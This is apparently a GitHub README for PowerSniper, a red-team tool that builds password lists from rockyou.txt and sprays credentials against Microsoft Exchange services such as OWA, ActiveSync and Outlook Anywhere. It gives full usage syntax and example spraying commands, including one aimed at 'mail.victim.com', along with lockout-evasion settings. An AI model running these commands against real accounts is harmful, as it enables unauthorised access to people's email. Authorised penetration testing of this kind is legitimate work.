Password spraying script and helper for creating password lists.
The Python script uses configurable parameters to extract complex passwords from a password list such as rockyou.txt. It then analyzes the Damerau-Levenshtein distance between that password and a list of common passwords (the text file in this repository is the top 20 most common rockyou passwords that could be easily modified to be a complex password, i.e. not the ones that are all digits). The script is configurable for the maximum distance to keep a password, with a default of 4, and will output results to a CSV file.
The PowerShell script loops through usernames and passwords and attempts to authenticate with them against various Microsoft Exchange web-based services. The script supports pausing after a specified lockout count for a specified period of time to prevent account lockouts.
PowerSniper supports password spraying against the following services at this time:
- Outlook Web Access
- Outlook Anywhere
- ActiveSync
The code that loads the Microsoft.Exchange.WebServices.dll for Outlook Anywhere authentication was found in the MailSniper tool (https://github.com/dafthack/MailSniper) created by @dafthack.
git clone https://github.com/codewatchorg/PowerSniper.git
usage: rockdist.py [-h] --wordlist WORDLIST --toplist TOPLIST [--output OUTPUT] [--passmin PASSMIN]
[--passmax PASSMAX] [--complex] [--passdist PASSDIST]
Get the distances between complex passwords and top passwords used
optional arguments:
-h, --help show this help message and exit
--wordlist WORDLIST the file with the complex rockyou passwords (default: None)
--toplist TOPLIST the file with the top rockyou passwords (default: None)
--output OUTPUT the CSV output of the analysis (default: analysis.csv)
--passmin PASSMIN the minimum size password to choose from (default: 7)
--passmax PASSMAX the maximum size password to choose from (default: 12)
--complex require complex passwords (default: 0)
--passdist PASSDIST the maximum distance between passwords to keep (default: 4)
Example passdist.py command:
python passdist.py --wordlist rockyou.txt --toplist toplist_rockyou.txt --output lowdist.csv --passmin 7
--passmax 12 --complex --passdist 4
This module loops through usernames and passwords and attempts to authenticate with them against various
Microsoft Exchange web-based services.
PowerSniper Function: Invoke-PowerSniper
Author: Josh Berry (@codewatchorg)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
Invoke-PowerSniper [[-uri] <Object>] [[-svc] <Object>] [[-userlist] <Object>]
[[-passlist] <Object>] [[-sos] <Object>] [[-lockout] <Object>]
[[-locktime] <Object>] [<CommonParameters>]
This module loops through usernames and passwords and attempts to authenticate with them against
various Microsoft Exchange web-based services. The script supports pausing after a specified
lockout count for a specified period of time to prevent account lockouts.
Example PowerSniper.ps1 usage:
# Outlook Anywhere Test
Invoke-PowerSniper -uri https://outlook.office365.com -svc oa -userlist users.txt -passlist passwords.txt
-sos false -lockout 6 -locktime 30
# ActiveSync Test
Invoke-PowerSniper -uri https://outlook.office365.com -svc as -userlist users.txt -passlist passwords.txt
-sos false -lockout 6 -locktime 30
# Outlook Web Access Test
Invoke-PowerSniper -uri https://mail.victim.com/owa/auth.owa -svc owa -userlist users.txt
-passlist passwords.txt -sos false -lockout 6 -locktime 30
Source: https://github.com/codewatchorg/